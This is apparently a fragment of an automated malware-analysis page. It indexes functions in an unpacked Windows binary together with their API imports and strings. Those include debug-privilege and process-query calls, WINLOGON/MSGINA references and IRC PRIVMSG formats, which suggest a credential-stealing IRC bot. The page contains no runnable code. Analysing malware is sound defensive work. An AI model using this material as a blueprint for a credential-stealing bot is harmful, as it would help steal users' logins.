	"CCCC"
	"0"
</font></pre></td></tr><tr id="sub_417156"><td><pre><a name="sub_417156"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_417156"><font size=+2>sub_417156</a>(f5ac)</font>:<font color=brown>
	"failed"
</font></pre></td></tr><tr id="sub_417517"><td><pre><a name="sub_417517"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_417517"><font size=+2>sub_417517</a>(f759)</font>:<font color=darkgreen>
	KERNEL32.LoadLibraryA
	KERNEL32.GetEnvironmentVariableW</font>
<font color=brown>
	"SeDebugPrivilege"
	"NTDLL.DLL"
	"NtQuerySystemInformation"
	"RtlCreateQueryDebugBuffer"
	"RtlQueryProcessDebugInformation"
	"RtlDestroyQueryDebugBuffer"
	"RtlRunDecodeUnicodeString"
	"USERNAME"
	"USERDOMAIN"
	"SeDebugPrivilege"
</font></pre></td></tr><tr id="sub_4099D2"><td><pre><a name="sub_4099D2"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4099D2"><font size=+2>sub_4099D2</a>(f7eb)</font>:<font color=darkgreen>
	KERNEL32.Sleep</font>
<font color=brown>
	"NOTICE"
	"PRIVMSG"
	"%s"
	"%s %s :%s\r\n"
</font></pre></td></tr><tr id="sub_41A311"><td><pre><a name="sub_41A311"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41A311"><font size=+2>sub_41A311</a>(f806)</font>:<font color=darkgreen>
	KERNEL32.Sleep</font>
<font color=brown>
	"PRIVMSG %s	:%s\r"
	"%s"
</font></pre></td></tr><tr id="sub_417BE6"><td><pre><a name="sub_417BE6"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_417BE6"><font size=+2>sub_417BE6</a>(f82b)</font>:<font color=darkgreen>
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_418065"><td><pre><a name="sub_418065"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418065"><font size=+2>sub_418065</a>(fa09)</font>:<font color=darkgreen>
	KERNEL32.CreateThread</font>
<font color=brown></font></pre></td></tr><tr id="sub_4176E9"><td><pre><a name="sub_4176E9"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4176E9"><font size=+2>sub_4176E9</a>(fc23)</font>:<font color=darkgreen>
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	NTDLL.RtlFreeHeap</font>
<font color=brown>
	"WINLOGON"
	"NWGINA"
	"MSGINA"
</font></pre></td></tr><tr id="sub_41BC09"><td><pre><a name="sub_41BC09"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41BC09"><font size=+2>sub_41BC09</a>(fd6e)</font>:<font color=darkgreen>
	NTDLL.RtlAllocateHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_425CC1"><td><pre><a name="sub_425CC1"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_425CC1"><font size=+2>sub_425CC1</a>(fe6c)</font>:<font color=darkgreen>
	KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr><tr id="sub_40E18F"><td><pre><a name="sub_40E18F"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40E18F"><font size=+2>sub_40E18F</a>(ff7b)</font>:<font color=darkgreen>
	WS2_32.socket
	WS2_32.inet_addr
	WS2_32.ntohs
	WS2_32.connect
	WS2_32.setsockopt
	WS2_32.send
	WS2_32.recv
	WS2_32.closesocket
	KERNEL32.Sleep</font>
<font color=brown>
	"�"
</font></pre></td></tr></table><script>
document.getElementById(window.location.href.split('#')[1]).setAttribute("style", "background-color:#ddddff");
</script>
</html>